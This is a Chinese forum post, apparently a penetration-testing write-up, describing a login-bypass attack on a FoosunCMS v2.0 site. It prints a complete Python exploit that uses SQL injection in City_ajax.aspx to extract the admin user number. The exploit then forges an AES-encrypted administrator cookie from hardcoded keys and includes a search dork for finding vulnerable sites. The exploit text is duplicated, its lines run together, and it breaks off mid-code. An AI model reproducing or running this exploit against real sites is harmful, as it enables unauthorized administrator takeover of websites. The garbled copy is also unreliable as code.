taibeihacker
Moderator
内网漫游拓扑图
利用登录绕过漏洞进行后台目標網站ip:192.168.31.55,將目標網站ip綁定到本地hosts文件下的www.test.com下(防止直接訪問ip網站加載不全),訪問www.test.com得到網站首頁,發現是一個html靜態網站
經過點擊發現該網站是FoosunCMS搭建的經過點擊發現該網站是FoosunCMS搭建的
版本為v2.0,存在可以利用的漏洞,繞過管理員賬號信息驗證,直接進入後台,可謂是非常危險的一個利用漏洞,訪問網站後台地址:/manage/Index.aspx
搜索發現FoosunCMS v2.0有一個登錄繞過漏洞,嘗試登錄繞過,訪問下面鏈接得到UserNumber
http://www.test.com/user/City_ajax....um from dbo.fs_sys_User where UserName='admin
發現得將UserNumber加密後拼接成cookie即可成功登錄
直接用sql注入拿到UserNumber,然後再與UserName等拼接,構造cookie直接以管理員權限登錄,Exp代碼如下:
#coding:utf-8import argparseimport urllibimport tracebackimport base64from Crypto.Cipher import AESfrom binascii import b2a_hex, a2b_hex#################################search keyword:####inurl:/manage/Login.aspx #################################KEY='Guz(%hj7x89H$yuBI0456FtmaT5fvHUFCy76*h%(HilJ$lhj!y6(*jkP87jH7'IV='E4ghj*Ghg7!rNIfb95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7!hg4ui%$hjk'def parse_args(): parser=argparse.ArgumentParser() parser.add_argument('-u', '--url', help='the url', required=True, nargs='+') return parser.parse_args()def run(url): try: usernumber=get_usernumber(url) if usernumber is not None: encrypt_cookie=generate_cookie(usernumber) #寫入cookie中write_cookie(url, encrypt_cookie) except Exception: traceback.print_exc()def get_usernumber(url): fullurl=url + '/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin' content=urllib.urlopen(fullurl).read() index=content.index('option value=\'') if index !=-1: usernumber=content[index+15:] usernumber=usernumber[0: content.index('\'')+1] print 'Get usernumber success. Usernumber is :', usernumber return usernumber else: print 'Get usernumber fail' return Nonedef pkcs7padding(data): bs=AES.block_size padding=bs - len(data) % bs padding_text=chr(padding) * padding return data + padding_textdef generate_cookie(usernumber): orgstr='%s,admin,0,1,False'%(usernumber,) cryptor=AES.new(KEY[0:32], AES.MODE_CBC, IV[0:16]) ciphertext=cryptor.encrypt(pkcs7padding(orgstr)) ciphertext=base64.b64encode(ciphertext) return ciphertextdef write_cookie(url, ciphercookie): print 'Generate Cookie[SITEINFO]:', ciphercookie print 'Now you can write cookie and access the url: %s/manage/index.aspx'%(url,)if __name__=='__main__': args=parse_args() try: if args.url is not None: run(args.url[0]) except Exception, e: print 'python Foosun_exp.py -u '執行後成功得到加密的繞過後台登錄cookie [IMG alt="1... tracebackimport base64from Crypto.Cipher imp
http://www.test.com/user/City_ajax....um from dbo.fs_sys_User where UserName='admin
#coding:utf-8import argparseimport urllibimport tracebackimport base64from Crypto.Cipher import AESfrom binascii import b2a_hex, a2b_hex#################################search keyword:####inurl:/manage/Login.aspx #################################KEY='Guz(%hj7x89H$yuBI0456FtmaT5fvHUFCy76*h%(HilJ$lhj!y6(*jkP87jH7'IV='E4ghj*Ghg7!rNIfb95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7!hg4ui%$hjk'def parse_args(): parser=argparse.ArgumentParser() parser.add_argument('-u', '--url', help='the url', required=True, nargs='+') return parser.parse_args()def run(url): try: usernumber=get_usernumber(url) if usernumber is not None: encrypt_cookie=generate_cookie(usernumber) #寫入cookie中write_cookie(url, encrypt_cookie) except Exception: traceback.print_exc()def get_usernumber(url): fullurl=url + '/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin' content=urllib.urlopen(fullurl).read() index=content.index('option value=\'') if index !=-1: usernumber=content[index+15:] usernumber=usernumber[0: content.index('\'')+1] print 'Get usernumber success. Usernumber is :', usernumber return usernumber else: print 'Get usernumber fail' return Nonedef pkcs7padding(data): bs=AES.block_size padding=bs - len(data) % bs padding_text=chr(padding) * padding return data + padding_textdef generate_cookie(usernumber): orgstr='%s,admin,0,1,False'%(usernumber,) cryptor=AES.new(KEY[0:32], AES.MODE_CBC, IV[0:16]) ciphertext=cryptor.encrypt(pkcs7padding(orgstr)) ciphertext=base64.b64encode(ciphertext) return ciphertextdef write_cookie(url, ciphercookie): print 'Generate Cookie[SITEINFO]:', ciphercookie print 'Now you can write cookie and access the url: %s/manage/index.aspx'%(url,)if __name__=='__main__': args=parse_args() try: if args.url is not None: run(args.url[0]) except Exception, e: print 'python Foosun_exp.py -u '執行後成功得到加密的繞過後台登錄cookie [IMG alt="1... tracebackimport base64from Crypto.Cipher imp